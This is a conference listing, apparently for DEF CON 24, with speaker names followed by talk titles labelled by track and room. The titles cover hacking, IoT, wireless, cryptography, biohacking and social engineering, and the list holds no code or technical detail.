Amirali Sanatinia
Amrita C. Iyer
Amro Abdelgawad
Anch
Andre McGregor
Andrea Coravos
Andrew Brandt
Andrew Crocker
Andrew Dutcher
Andy Robbins (@_wald0)
Ang Cui
Ankur Tyagi
Anthony Rose
Anto Joseph
Antonio Bianchi
Aravind Machiry
Arnaud Lebrun
Arnaud Soullie
Arthur Garipov
ashmastaflash
Awesome Folks from Various BioHacking Podcasts
Balint Seeber
Ben Ramsey
Benjamin Holland
Bertin Bervis Bonilla
Bertin Bervis
Bethany Ward
bigezy
Brad Dixon
Brad Woodberg
brain
Brendan Oconnor
Brian Butterly
Brian Butterly
Brian Gorenc
Brian Redbeard
Bryant Zadegan
Buckaroo
c00p3r
Caleb Mays
Candice Schumann
Carl Vincent
Casey
Cassiopiea
Catherine (Kate) Pearce
Cell Wizard
Charles Fracchia
Charles Tritt
Chef
Chen Yan
Chet Hosmer
Chris Eagle
Chris Frenz
Chris Hadnagy
Chris Moore
Chris Rock
Chris Salls
Christian Dameff
Christian Heinrich
Christian
Chuck Easttom
Chuck McAuley
CINCVolFLT
Clarence Chio
Cosmo Mielke
Craig Young
CrYpT
Cyni Winegard
Dallas
Damien Cauquil, Digital Security (CERT-UBIK), Senior Security Researcher
Dan ‘AltF4’ Petro
Dan Tentler (Viss)
Daniel Grant
Dark Tangent
darkmatter
Darren Kitchen
Darren Lawless
Darren
David Bach
David Caissy
David Fritz
David Kennedy
David Wong
Dazzle Cat Duo
Dean Pierce
Dean Sysman
DEF CON 101
Deirdre Connolly
Delta Zero
Denis Makrushin
Dennis Maldonado (AKA Linuz)
Dinesh Shetty
dlaw
Dominic White
Doug Weber
Dr. Arati Prabhakar
Dr. Jeanna N. Matthews
Dr. Jeremy Giliula
Dr. Paul Vixie
Dr. Phil
Dr. Stan Naydin
Dr. Stanislav Naydin
Dr. Thomas P. Keenan
Dragos Boia
Dylan James Smith
Ed Felten
Ed Williams
Ed You
Edward You
Eijah
Eldar Zaitov
Elizabeth Wharton
Elvis Collado, Praetorian, Senior Security Researcher
Eric Escobar
Erin Jacobs
Erin
Eva Galperin
Evan Booth
Evan Johnson (ejcx_)
Evgeny Sidorov
Fadli Sidek
Fatih Ozavci
Ferdinand Noelscher
Filip Reesalu
Filippo Valsorda
Fish Wang
follower
Francesco Disperati
Francesco Mifsud
Francois Charbonneau
Fred Bret-Mounet
Fritz Sands
Gabriel Ryan
Garett Montgomery
Georgi Geshev
Georgia Weidman
GingerBread
Gingerbread
Giovanni Vigna
Gita Ziabari
goldfisk
Granolocks
Grant Bugher
GrayRaven
Grecs
Greg Norcie
Guevara Noubir
Haoqi Shan
Haystack
Henrik Schmidt
HighWiz
Hunter Scott
Hyrum Anderson
Iam McCollum
Idan Revivo
Ignat Korchagin
int0x80
Ioannis Koniaris
J0N J4RV1S
Jacopo Corbetta
Jake Kambic
Jake Kouns
Jake Williams
James Edge
James Jara
James Loureiro
James Powell
Jatin Kataria
Javier Vazquez Vidal
Jay
Jay Beale
Jay DiMartino
Jay Healey
Jay Radcliffe
Jayson Street
Jeff Kitson, Trustwave SpiderLabs, Security Researcher
Jeffrey Tibbetts
Jen
Jennifer S. Granick
Jennifer Szkatulski
Jérémy Matos
Jesse Michael
Jianhao Liu
Jmaxxz
Joe FitzPatrick
Joe Gervais (TryCatchHCF)
Joe Grand (Kingpin)
Joel Dapello
Joey Muniz
Johanna Curiel
John Bambenek
John Bass
John Floren
John Heise
John Poulin
John Spearing
John Sundman
Jonathan Brossard
Jonathan Mayer
Jonathan-Christofer Demay
Jose Gutierrez
Joseph Needleman
Joseph Zadeh
joseph
Joshua Drake
Joshua Pereyda
Julian Dana
Jun Axup
JusticeBeaver (Eric Escobar)
K2
Kai Zhong
Karl Hiramoto
Karl Kasarda
Karyn Benson
Kat Sweet
Katea Murray
Kathy Wang
Katitza Rodriguez
Ke Sun
Ken Belva
Kenneth Lee
Kenny McElroy
Keoni Gandall
Kevin Borgolte
Kevin Cooper
Kevin Sacco
Kim Zetter
KingPhish3r
Kurt Opsahl
Ladar Levison
Larry Cashdollar
Larry Pesce
Lennart Koopman
Lizzie Borden
Lorrie Cranor
LosT
Louis Auguste
Lucas Lundgren
Luke Young
Madhu Akula
Marc Newlin
Marc Rogers
Marcello Mansur
Marcello Salvati
Marco Grassi
Mat Caughron (cryptofile)
Matt Cheung
Matt DuHarte
Matt Knight
Matt Trimble
Matteo Beccaro
Matteo Collura
Matthew Hicks
Mattias Borg
Max Bazaliy
Medic (Tim McGuffin)
Melanie Stegman, Ph.D.
Meow Ludo Meow Meow
Michael Hudson
Michael Leibowitz
Michael Zaytsev
Mickey Shkatov
Miguel Antonio Guirao Aguilera
Mike Fauzy
Mike Petruzzi (wiseacre)
Mike Raggo
Mike Walker
Mike
Morgan "Indrora" Gangwere
Mr_Br!ml3y
Mr. Br!ml3y
Ms. Kaitlin A. Trumbull
Mudge Zatko
Munin
Nate Cardozo
Nathan Hoch
Neal Hindocha
nephifetnf
NeuroTechX
Nezer Zaidenberg (scipio)
nibb13
Nicholas Rosario (MasterChen)
Nick Anderson
Nick Stephens
Nikita Kronenberg
Nir Vailman
Nolan Berry
obiwan666
Omer Zohar
Patrick Mathieu
Patrick Wardle
Patrick Watson
Paul Ashley
Paul Dant
Paul Stone
Paulino Calderon
Pen Test Partners
Per Thorsheim
Peter Hefley
Petri Koivisto
Phax
Phillip Bosco
Phillip Maddux
Piotr Esden-Tempski
Plore
Plug
Przemek Jaroszewski
Pyr0
Qidan He
qu0rum
Radia Perlman
Rafael Fontes Souza
Randall Alley
razzies
Rear Admiral (ret.) David Simpson, FCC, Bureau Chief
regilero
RenderMan
Renee Wegzyn
Rep. Eric Swalwell (D-CA 15th)
Rep. Will Hurd (R-TX 23rd)
Rich Lee
Rich Mogull
Richard Thieme (Neuralcowboy)
Richard Thieme
Rick Glass
Ricky ‘HeadlessZeke’ Lawshae
Riyaz Walikar
Rob Olson
Robert Anderson
Robert Leale
Robert Simmons
Roberto Giacobazzi
Robin Farmanfarmaian
Robin Jackson
Rock Stevens
Rod Soto
Rodrigo Maximiano Antunes de Almeida
Rogan Dawes
Rohan Vazarkar (@cptjesus)
Ronny Bull
Ruben Boonen
Rushikesh D. Nandedkar
Ryan Kazanciyan
Ryan Lester
Ryan Mitchell
Ryan O'Shea
Ryan Schmoll
saci
Salvador Mendoza
Sam Bowne
Sarah Zatko
Scott Carlson
Scott Novich
Sean Metcalf
Sean Satterlee (ohm)
Seb Kinne
Sebastian Westerhold
Sereyvathana Ty
Seth Wahle
Shaf Patel
Shane Kemper
Shane Steiger, Esq.
Shubham Mittal
Siegfried Rasthofer
Simon Roses
Six_Volts
Skunkworks
Smitty of Halibut, KR6ZY
Sneha Rajguru
Staff
Stefan Kiese
Stephan Huber
Stephen Chavez
Steve Christey Coley
Steve Pordon
Steve Weingart
Steven Zani
Tamas Szakaly
Tarah
Taylor Hornby
tb68r
TBA
Terrell McSweeny, Federal Trade Commission, Commissioner
Terrell McSweeny
Tess Schrodinger
The Bob Ross Fan Club
the headless chook
Thomas Wilhelm
Tim ‘t0rch’ Estell
Tim Cannon
Tim O'Shea
Tim Quester
Todd Kendall
Tom Hayes
Tom Kopchak
Tom Sellers
Tomohisa Ishikawa
Towne Besel
Travis Lawrence
Trevor Goodman
Trey Blalock (PrivacyGeek)
TryCatchHCF
Tyler Oderkirk
Ulf Frisk
Victoria Sutton
Vincent Canfield
Vivek Notani
Vlad Gostomelsky
Vladimir Daschenko
Walt Williams
Wanqiao Zhang
Wenyuan Xu
Wesley McGrew
Weston Hecker
Will Schroeder (@harmj0y)
Willa Cassandra Riggins (abyssknight)
Willis Vandevanter
xian
Ya Ou
Yan Shoshitaishvili
Yonathan Klijnsma
Zack Fasel
Ze'ev Glozman
Zero_Chaos
Zoz
Talk List
DEFCON-Track One- "Cyber" Who Done It?! Attribution Analysis Through Arrest History
DEFCON-Track One- Robot Hacks Video Games: How TASBot Exploits Consoles with Custom Controllers
CPV-Bronze 1-"My Usability Goes to 11": A Hacker's Guide to User Experience Research
DEFCON-Track Two-(Ab)using Smart Cities: the dark age of modern mobility
SE-Palace 2-5-….and bad mistakes I’ve made a few….
IOT-Bronze 4-0-day Hunting
BHV-Skyview 4-0day for the Soul
DEFCON-DEF CON 101-101 Ways to Brick your Hardware
DEFCON-DEF CON 101-411: A framework for managing security alerts
SE-Palace 2-5-7 Jedi Mind Tricks: Influence Your Target With Out A Word
SkyTalks-Skyview 3-A Guide to Outsmarting the Machines
DEFCON-DEF CON 101-A Journey Through Exploit Mitigation Techniques in iOS
DEFCON-Track Two-A Monitor Darkly: Reversing and Exploiting Ubiquitous...
DEFCON-Track Two-Abusing Bleeding Edge Web Standards for AppSec Glory
SkyTalks-Skyview 3-Accessibility: A Creative Solution to Living Without Sight
SkyTalks-Skyview 3-Active Incident Response
WOS-Skyview 6-Adding Ramparts to Your Bastille: An Introduction to SELinux Hardening
Workshops-Las Vegas Ballroom 7-Advanced Blind SQL Injection Exploitation
SE-Palace 2-5-Advanced social engineering techniques and the rise of cyber scams industrial complex
DEFCON-Track Two-All Your Solar Panels are belong to Me
DEFCON-Track Two-An introduction to Pinworm: man in the middle for your metadata
HHV-Contest Area-An Introduction To Pulling Software From Flash via I2C, SPI and JTAG
Workshops-Las Vegas Ballroom 3-Analyzing Internet Attacks with Honeypots
Demolabs-Table 1-Android-InsecureBank
DEFCON-DEF CON 101-Anti-Forensics AF
Workshops-Las Vegas Ballroom 7-Applied Physical Attacks on Embedded Systems, Introductory Version
SkyTalks-Skyview 3-Art of Espionage (v.303)
CPV-Bronze 2-Ask the EFF: The Year in Digital Civil Liberties
DEFCON-Track Three-Ask the EFF
DEFCON-Track One-Attacking BaseStations - an Odyssey through a Telco's Network
BHV-Skyview 4-Attacking EMR (Electronic Health Records) - Using HL7 and DICOM to Hack Critical Infrastructure
DEFCON-DEF CON 101-Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5
WOS-Skyview 6-Attacks on Enterprise Social Media
BHV-Skyview 4-Attention Hackers: Cannabis Needs Your Help!
DEFCON-DEF CON 101-Auditing 6LoWPAN Networks using Standard Penetration Testing Tools
SkyTalks-Skyview 3-Automated DNS Data Exfiltration and Mitigation
WOS-Skyview 6-Automated Dorking for Fun and Profit^WSalary
Demolabs-Table 4-Automated Penetration Toolkit (APT2)
CPV-Bronze 2-Backdooring Cryptocurrencies: The Underhanded Crypto Contest Winners
DEFCON-Track Three-Backdooring the Frontdoor
DEFCON-DEF CON 101-Beyond the MCSE: Red Teaming Active Directory
BHV-Skyview 4-Biohackers Die
BHV-Skyview 4-BioHacking and Mortal Limitations
BHV-Skyview 4-Biohacking for National Security
BHV-Skyview 4-Biohacking Street Law
BHV-Skyview 4-Biohacking: The Moral Imperative to Build a Better You
BHV-Skyview 4-Biosafety for the Home Enthusiast
BHV-Skyview 4-Biotechnology Needs a Security Patch...Badly
Wireless-Skyview 1-Blinded by the Light
BHV-Skyview 4-Blockchain's Role in the Disruption of the Medical Industry
DEFCON-Track Two-BlockFighting with a Hooker -- BlockfFghter2!
Demolabs-Table 3-Boscloner - All in One RFID Cloning Toolkit
Workshops-Las Vegas Ballroom 3-Brainwashing Embedded Systems
CPV-Bronze 2-Breaking Bad Crypto: BB'06 [WORKSHOP]
SkyTalks-Skyview 3-Breaking Payment Points of Interaction
DEFCON-Track Three-Breaking the Internet of Vibrating Things...
DEFCON-DEF CON 101-BSODomizer HD: A mischievous FPGA and HDMI platform for the (m)asses
IOT-Bronze 1-BtleJuice: the Bluetooth Smart Man In The Middle Framework
WOS-Skyview 6-Building a Local Passive DNS Tool for Threat Intelligence Research
HHV-Contest Area-Building malicious hardware out of analog circuits
Demolabs-Table 1-BurpSmartBuster
DEFCON-Track One-Bypassing Captive Portals and Limited Networks
Workshops-Las Vegas Ballroom 1-C/C++ Boot Camp for Hackers
DEFCON-Track Three-CAN i haz car secret plz?
DEFCON-Track One-Can You Trust Autonomous Vehicles: Contactless Attacks ...
DEFCON-Track Three-CANSPY: A Framework for Auditing CAN Devices
Workshops-Las Vegas Ballroom 2-Car Hacking Workshop
DEFCON-Track Three-Cheap Tools for Hacking Heavy Trucks
Demolabs-Table 1-Cloakify Exfiltration Toolset
CPV-Bronze 1-Code breaking - Catching a cheat
DEFCON-Track One-Compelled Decryption - State of the Art in Doctrinal Perversions
BHV-Skyview 4-Computational Chemistry on a Budget
WOS-Skyview 6-Connections: Eisenhower and the Internet
Demolabs-Table 4-CrackMapExec
WOS-Skyview 6-Crawling for APIs
BHV-Skyview 4-Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science
BHV-Skyview 4-CRISPR/Cas9: Newest Tools for Biohacking fun
CPV-Bronze 2-Crypto for Criminals: The OPSEC Concerns in Using Cryptography
DEFCON-Track Three-Crypto State of the Law
Demolabs-Table 2-CuckooDroid 2.0
DEFCON-Track Three-Cunning with CNG: Soliciting Secrets from Schannel
Workshops-Las Vegas Ballroom 2-Cyber Deception: Hunting advanced attacks with MazeRunner
DEFCON-Track Two-Cyber Grand Shellphish
BHV-Skyview 4-Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode
DEFCON-Track Two-DARPA Cyber Grand Challenge Award Ceremony
Demolabs-Table 2-DataSploit
WOS-Skyview 6-Deceive and Succeed: Measuring the Efficiency of a Deception Eco-System in Post-Breach Detection
Demolabs-Table 6-Deep look at back end systems of the future of credit card fraud.
DEFCON-DEF CON 101-DEF CON 101 Panel
Demolabs-Table 5-DEF CON Wireless Collection Service (DCWCS)
Paris-Le Bar Du Sport-DEFCON 24 Meetup for /r/Defcon
BHV-Skyview 4-Designer Babies
Wireless-Skyview 1-Detecting and Finding Rogue Access Points
DEFCON-Track Three-Developing Managed Code Rootkits for the Java Runtime Environment
DEFCON-Track Three-Direct Memory Attack the Kernel
Demolabs-Table 5-Dirt Simple Comms v2 (DSC2)
Demolabs-Table 3-Disable Single Step Debug with Xmode Code
DEFCON-Track Two-Discovering and Triangulating Rogue Cell Towers
DEFCON-Track Two-DIY Nukeproofing: a new dig at "data-mining"
BHV-Skyview 4-DIYBioweapons and Regulation
Demolabs-Table 2-DNS Analyse
SkyTalks-Skyview 3-DNS Greylisting for Phun and Phishing Prevention
SE-Palace 2-5-Does Cultural differences become a barrier for social engineering?
Wireless-Skyview 1-Drone Hijacking and other IoT hacking with GNU Radio and XTRX SDR
DEFCON-Track Two-Drones Hijacking - multi-dimensional attack vectors & countermeasures
WOS-Skyview 6-Dynamic Population Discovery for Lateral Movement Detection (Using Machine Learning)
HHV-Contest Area-EagleCAD Basics
Workshops-Las Vegas Ballroom 6-Embedded system design: from electronics to microkernel development
Demolabs-Table 6-Emo-Tool/OldYeller/Ransomware-Simulator
DEFCON-DEF CON 101-Escaping The Sandbox By Not Breaking It
DEFCON-DEF CON 101-Esoteric Exfiltration
BHV-Skyview 4-Ethical Challenges & Responsibilities of Biohackers and Artists
Wireless-Skyview 1-Evil ESP
DEFCON-Track Three-Examining the Internet's pollution
Workshops-Las Vegas Ballroom 4-Exploit Development for Beginners
IOT-Bronze 4-Exploiting a Smart Fridge: a Case Study in Kinetic Cyber
DEFCON-Track Three-Exploiting and attacking seismological networks.. remotely
BHV-Skyview 4-Fancy Dancy Implanty
IOT-Bronze 4-FCC 5G/IoT Security Policy Objectives
DEFCON-Track One-Feds and 0Days: From Before Heartbleed to After FBI-Apple
WOS-Skyview 6-Fiddler on the Roof: A No-Nonsense Look at Fiddler and Its Usage
SkyTalks-Skyview 3-Financial Crime: Past, Present, and Future
BHV-Skyview 4-Flavor-Tripping: a Whole New Way to Taste!
DEFCON-Track One-Forcing a Targeted LTE Cellphone into Unsafe Network
SkyTalks-Skyview 3-Front Door Nightmare
DEFCON-Track One-Frontrunning The Frontrunners
BHV-Skyview 4-Future Grind
Workshops-Las Vegas Ballroom 5-Fuzzing Android Devices
WOS-Skyview 6-Fuzzing For Humans: Real Fuzzing in the Real World
DEFCON-Track Three-Game over, man! - Reversing Video Games to Create an Unbeatable AI Player
CPV-Bronze 2-Getting Started with Cryptography in Python [WORKSHOP]
SkyTalks-Skyview 3-God is a Human II - Artificial Intelligence and the Nature of Reality
Demolabs-Table 3-Graylog
Workshops-Las Vegas Ballroom 1-Guaranteed Security (Session 1)
Workshops-Las Vegas Ballroom 1-Guaranteed Security (Session 2)
DEFCON-DEF CON 101-Hacker Fundamentals and Cutting Through Abstraction
DEFCON-Track Three-Hacker-Machine Interface - State of the Union for SCADA HMI Vulnerabilities
DEFCON-Track Two-Hacking Hotel Keys and Point of Sale systems ...
Workshops-Las Vegas Ballroom 6-Hacking Network Protocols using Kali
DEFCON-Track One-Hacking Next-Gen ATM's From Capture to Cashout.
BHV-Skyview 4-Hacking Sensory Perception
BHV-Skyview 4-Hacking the Second Genetic Code using Information Theory
Wireless-Skyview 1-Handing Full Control of the Radio Spectrum Over to the Machines
Workshops-Las Vegas Ballroom 4-Hands-on Cryptography with Python
BHV-Skyview 4-Health as a service...
DEFCON-Track One-Help, I've got ANTs!!!
DEFCON-Track One-Hiding Wookiees in HTTP - HTTP smuggling...
CPV-Bronze 2-Highlights from the Matasano Challenges [WORKSHOP]
SkyTalks-Skyview 3-Homologation - Friend or Frenemy?
DEFCON-Track One-Honey Onions: Exposing Snooping Tor HSDir Relays
Demolabs-Table 6-HoneyPy and HoneyDB
IOT-Bronze 4-Hot Wheels: Hacking Electronic Wheelchairs
Wireless-Skyview 1-How Do I "BLE Hacking"?
IOT-Bronze 4-How the Smart-City becomes Stupid
CPV-Bronze 1-How to backdoor Diffie-Hellman
DEFCON-Track One-How to design distributed systems resilient despite malicious participants
DEFCON-Track One-How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire
WOS-Skyview 6-How to Find 1,352 WordPress XSS Plugin Vulnerabilities in 1 Hour (not really)
DEFCON-DEF CON 101-How to get good seats in the security theater? Hacking boarding passes for fun & profit.
DEFCON-Track Three-How to Make Your Own DEF CON Black Badge
DEFCON-Track One-How to overthrow a Government
DEFCON-Track One-How To Remote Control An Airliner: Security Flaws in Avionics
SE-Palace 2-5-How to Un-Work your job: Revolutions, Radicals and Engineering by Committee.
BHV-Skyview 4-How to use the Scientific Method in Security Research
BHV-Skyview 4-How your doctor might be trying to kill you and how personal genomics can save your life
WOS-Skyview 6-HTTP/2 & QUIC: Teaching Good Protocols To Do Bad Things
SE-Palace 2-5-Human Hacking: You ARE the weakest link.
BHV-Skyview 4-Human-Human Interface
Workshops-Las Vegas Ballroom 3-Hunting Malware at Scale with osquery
Wireless-Skyview 1-I Amateur Radio (And So Can You!)
DEFCON-Track Two-I Fight For The Users, Episode I - Attacks Against Top Consumer Products
DEFCON-Track Three-I've got 99 Problems, but LittleSnitch ain't one
Wireless-Skyview 1-Imagine a Beowulf cluster of Pineapples!
BHV-Skyview 4-Implants: Show and Tell
BHV-Skyview 4-Implants
WOS-Skyview 6-Incident Code Name: When SkyFalls A Shaken, Not Stirred, James Bond Tale on Incident Response
CPV-Bronze 2-Instegogram: Exploiting Instagram for C2 via Image Steganography
Wireless-Skyview 1-Insteon, Inste-off, Inste-open?
IOT-Bronze 4-Internet of Thieves (or DIY Persistence)
BHV-Skyview 4-Intro to Brain Based Authentication
Workshops-Las Vegas Ballroom 2-Intro to Memory Forensics With Volatility
CPV-Bronze 2-Introducing Man In The Contacts attack to trick encrypted messaging apps
Wireless-Skyview 1-Introducing the HackMeRF
DEFCON-Track Three-Introducing the Witchcraft Compiler Collection : Towards universal code theft
Workshops-Las Vegas Ballroom 6-Introduction to Penetration Testing with Metasploit
Workshops-Las Vegas Ballroom 5-Introduction to x86 disassembly
Workshops-Las Vegas Ballroom 6-Intrusion Prevention System (IPS) Evasion Techniques
IOT-Bronze 1-IoT Defenses - Software, Hardware, Wireless and Cloud
BHV-Skyview 4-IoT of Dongs
IOT-Bronze 1-Is Your Internet Light On? Protecting Consumers in the Age of Connected Everything
Wireless-Skyview 1-It's Just Software, Right?
DEFCON-Track One-Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker
CPV-Bronze 2-JWTs in a flash!
Wireless-Skyview 1-Kickin' It Old Skool: SDR for Ye Olde Signals
Demolabs-Table 1-LAMMA (beta)
CPV-Bronze 2-Lessons from the Hacking of Ashley Madison
DEFCON-Track Two-Let's Get Physical: Network Attacks Against Physical Security Systems
SkyTalks-Skyview 3-Lie to Me - LIE TO THEM: Chronicles of "How to save $ at the Strip Club"
DEFCON-Track Two-Light-Weight Protocol! Serious Equipment! Critical Implications!
IOT-Bronze 4-Live Drone RF Reverse Engineering
WOS-Skyview 6-LTE and Its Collective Insecurity
DEFCON-DEF CON 101-Machine Duping 101: Pwning Deep Learning Systems
DEFCON-DEF CON 101-Maelstrom - Are You Playing with a Full Deck?...
BHV-Skyview 4-Make your own Brain device
DEFCON-DEF CON 101-Malware Command and Control Channels: A journey into darkness
CPV-Bronze 2-Managing digital codesigning identities in an engineering company
DEFCON-DEF CON 101-Meet the Feds
BHV-Skyview 4-Microscopes are Stupid
BHV-Skyview 4-Might as well name it Parmigiana, American, Cheddar, and Swiss
Demolabs-Table 4-minimega
WOS-Skyview 6-Mining VirusTotal for Operational Data and Applying a Quality Control On It
Workshops-Las Vegas Ballroom 1-Mobile App Attack : Taming the evil app!
DEFCON-DEF CON 101-Mouse Jiggler Offense and Defense
DEFCON-Track Two-MouseJack: Injecting Keystrokes into Wireless Mice
DEFCON-Track Three-Mr. Robot Panel
Wireless-Skyview 1-Multi-channel Wardriving Tools for IEEE 802.15.4 and Beyond
BHV-Skyview 4-My dog is a hacker and will steal your data!
BHV-Skyview 4-Neuro Ethics
BHV-Skyview 4-Neurogenic Peptides: Smart Drugs 4-Minute Mile
DEFCON-DEF CON 101-NG9-1-1: The Next Generation of Emergency Ph0nage
Workshops-Las Vegas Ballroom 5-Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation
Workshops-Las Vegas Ballroom 5-Nmap NSE development for offense and defense
BHV-Skyview 4-Nootropics: Better Living Through Chemistry or Modern-Day Prometheus
WOS-Skyview 6-Now You See Me, Now You Don't
DEFCON-DEF CON 101-NPRE - Eavesdropping on the Machines
CPV-Bronze 2-Oops, I Cracked My PANs
Workshops-Las Vegas Ballroom 7-Open Source Malware Lab
Workshops-Las Vegas Ballroom 1-Operation Dark Tangent: The Def Con Messaging Protocol (DCMP)
SkyTalks-Skyview 3-Oops! I made a machine gun: The Progressive Lowering of the Barrier to Entry in Firearms Manufacturing
CPV-Bronze 2-Overview and evolution of password-based authentication schemes
Demolabs-Table 5-OWASP ZSC Shellcode
Demolabs-Table 2-OXML XXE
Workshops-Las Vegas Ballroom 6-PCB Design Crash Course: A primer to designing your own hacking tools.
Workshops-Las Vegas Ballroom 7-Pentesting ICS 101
DEFCON-DEF CON 101-Phishing without Failure and Frustration
Workshops-Las Vegas Ballroom 7-Physical Security for Computing Systems, a Look at Design, Attacks and Defenses
DEFCON-Track Three-Picking Bluetooth Low Energy Locks from a Quarter Mile Away
IOT-Bronze 4-Picking Bluetooth Low Energy Locks from a Quarter Mile Away
DEFCON-Track Two-pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle
Demolabs-Table 3-PKI for the People
DEFCON-Track Three-Platform Agnostic Kernel Fuzzing
DEFCON-Track Two-Playing Through the Pain? - The Impact of Secrets and Dark Knowledge
Workshops-Las Vegas Ballroom 1-Practical Android Application Exploitation
SkyTalks-Skyview 3-Practical Penetration Testing of Embedded Devices
CPV-Bronze 2-Practical Text-Based Steganography: Exfiltrating Data from Secure Networks and Socially Engineering SecOps Analysts [WORKSHOP]
Workshops-Las Vegas Ballroom 6-Pragmatic Cloud Security: Hands-On Turbocharged Edition
WOS-Skyview 6-Presenting Security Metrics to the Board / Leadership
CPV-Bronze 2-privacy by design - it's n0t that difficult
DEFCON-Track Two-Project CITL
DEFCON-DEF CON 101-Propaganda and you (and your devices)...
BHV-Skyview 4-Psychoactive Chemicals in Combat
Ballys-Blu Pool-Queercon Pool Party - DJ Bret Law - Seattle
Workshops-Las Vegas Ballroom 4-Raspberry Pi and Kali Deluxe Spy workshop
Workshops-Las Vegas Ballroom 3-Ready? Your Network is Being Pwned NOW!
DEFCON-DEF CON 101-Realtime bluetooth device detection with Blue Hydra
DEFCON-Track One-Research on the Machines: Help the FTC Protect Privacy & Security
DEFCON-Track One-Retweet to win: How 50 lines of Python made me the luckiest guy on Twitter
BHV-Skyview 4-Reverse engineering biological research equipment for fun and open science
IOT-Bronze 1-Reversing and Exploiting Embedded Devices
Wireless-Skyview 1-Reversing LoRa: Deconstructing a Next-Gen Proprietary LPWAN
BHV-Skyview 4-Reversing Your Own Source Code
CPV-Bronze 1-Revocation, the Frailty of PKI
BHV-Skyview 4-Rise of the Lovetron9000
SkyTalks-Skyview 3-Rotten to the core white box switching as the new abandonware
SkyTalks-Skyview 3-Saflok or Unsaflok, That is the Question
DEFCON-Track Two-Samsung Pay: Tokenized Numbers, Flaws and Issues
SE-Palace 2-5-SCAM CALL – Call Dropped
DEFCON-DEF CON 101-Secure Penetration Testing Operations: Demonstrated Weaknesses in Learning Material and Tools
CPV-Bronze 1-Security Logs Aren't Enough: Logging for User Data Protection
IOT-Bronze 1-Sense & Avoid: Some laws to know before you break IoT
BHV-Skyview 4-Sensory Augmentation 101
DEFCON-DEF CON 101-Sentient Storage - Do SSDs Have a Mind of Their Own?
DEFCON-Track Two-Side-channel attacks on high-security electronic safe locks
CPV-Bronze 1-Silicon Valley and DC talk about freedom, crypto, and the cybers
DEFCON-DEF CON 101-SITCH - Inexpensive, Coordinated GSM Anomaly Detection
DEFCON-Track One-Six Degrees of Domain Admin ...
DEFCON-Track Two-Sk3wlDbg: Emulating all (well many) of the things with Ida
SkyTalks-Skyview 3-Slack as Intelligence Collector or "how anime cons get weird"
Wireless-Skyview 1-Slaying Rogue Access Points with Python and Cheap Hardware
DEFCON-Track Two-Slouching Towards Utopia: The State of the Internet Dream
IOT-Bronze 1-SNMP and IoT Devices: Let me Manage that for you Bro!
DEFCON-DEF CON 101-So you think you want to be a penetration tester
CPV-Bronze 1-SSL Visibility, Uncovered
BHV-Skyview 4-Standardizing the Secure Deployment of Medical Devices
DEFCON-Track Two-Stargate: Pivoting Through VNC To Own Internal Networks
CPV-Bronze 2-State of the Curve - 2016
DEFCON-DEF CON 101-Sticky Keys To The Kingdom: Pre-auth RCE Is More Common Than You Think
DEFCON-Track One-Stumping the Mobile Chipset
CPV-Bronze 2-Tabletop Cryptography
Workshops-Las Vegas Ballroom 4-Taking a bite out of Apple
SkyTalks-Skyview 3-Taking Down Skynet (By Subverting the Command and Control Channel)
BHV-Skyview 4-Tales from a healthcare hacker
SkyTalks-Skyview 3-Tales from the Dongosphere: Lessons Learned Hosting Public Email for 4chan
IOT-Bronze 4-TBA
BHV-Skyview 4-tDCS workshop
BHV-Skyview 4-The Bioethics of BioHacking
BHV-Skyview 4-The Bitcoin DNA Challenge
BHV-Skyview 4-The Brave New World of Bio-Entrepreneurship
BHV-Skyview 4-The collision of prosthetics, robotics and the human interface
Wireless-Skyview 1-The Covert Cupid Under .11 Veil !!! /* Approach for Covert WIFI */
BHV-Skyview 4-The Era of Bio Big Data: Benefits and Challenges for Information Security, Health, the Economy, and National Security
BHV-Skyview 4-The Future is Fake Identities
Workshops-Las Vegas Ballroom 5-The In’s and Outs of Steganography
BHV-Skyview 4-The New White Hat Hacking: Computational Biology for the Good of Mankind
BHV-Skyview 4-The Next Big Thing in Bioterrorism
SkyTalks-Skyview 3-The next John Moses Browning will use GitHub
SkyTalks-Skyview 3-The other way to get a hairy hand; or, contracts for hackers
BHV-Skyview 4-The Patient as CEO
DEFCON-Track Three-The Remote Metamorphic Engine: Detecting, Evading, Attacking the AI and Reverse Engineering
BHV-Skyview 4-The Rise of Digital Medicine: At-home digital clinical research
CPV-Bronze 2-The State of HTTPS: securing web traffic is not what it used to be
SkyTalks-Skyview 3-The trials & tribulations of an infosec pro in the government sector
SE-Palace 2-5-The Wizard of Oz – Painting a reality through deception
IOT-Bronze 4-Thermostat Ransomware and Workshop
SkyTalks-Skyview 3-To Beat the Toaster, We Must Become the Toaster: How to Show A.I. Who's Boss in the Robot Apocalypse
BHV-Skyview 4-To Beat the Toaster, You Must Become the Toaster: How to Show AI Who's Boss in the Robot Apocalypse
WOS-Skyview 6-To Catch An APT: YARA
BHV-Skyview 4-Total Recall: Implanting Passwords in Cognitive Memory
DEFCON-DEF CON 101-Toxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity
IOT-Bronze 1-Tranewreck
BHV-Skyview 4-Trigraph: An Ethereum-based Teleradiology Application
DEFCON-Track Two-Universal Serial aBUSe: Remote physical access attacks
SE-Palace 2-5-US Interrogation Techniques and Social Engineering
Workshops-Las Vegas Ballroom 5-Use Microsoft Free Security Tools as a Ninja
DEFCON-Track Three-Use Their Machines Against Them: Loading Code with a Copier
WOS-Skyview 6-Verifying IPS Coverage Claims: Here's How
BHV-Skyview 4-Video Games Can Teach Science: ScienceGameCenter.org
Demolabs-Table 5-VirusTotalego
Demolabs-Table 4-Visual Network and File Forensics using Rudra
DEFCON-Track Three-VLAN hopping, ARP poisoning & MITM Attacks in Virtualized Environments
Workshops-Las Vegas Ballroom 3-VoIP Wars: The Live Workshop
DEFCON-DEF CON 101-Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game
Workshops-Las Vegas Ballroom 2-Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach
DEFCON-DEF CON 101-Weaponize Your Feature Codes
DEFCON-Track One-Weaponizing Data Science for Social Engineering: Automated E2E spear phishing on Twitter
Demolabs-Table 6-WebSec: a cross platform large scale vulnerability scanner
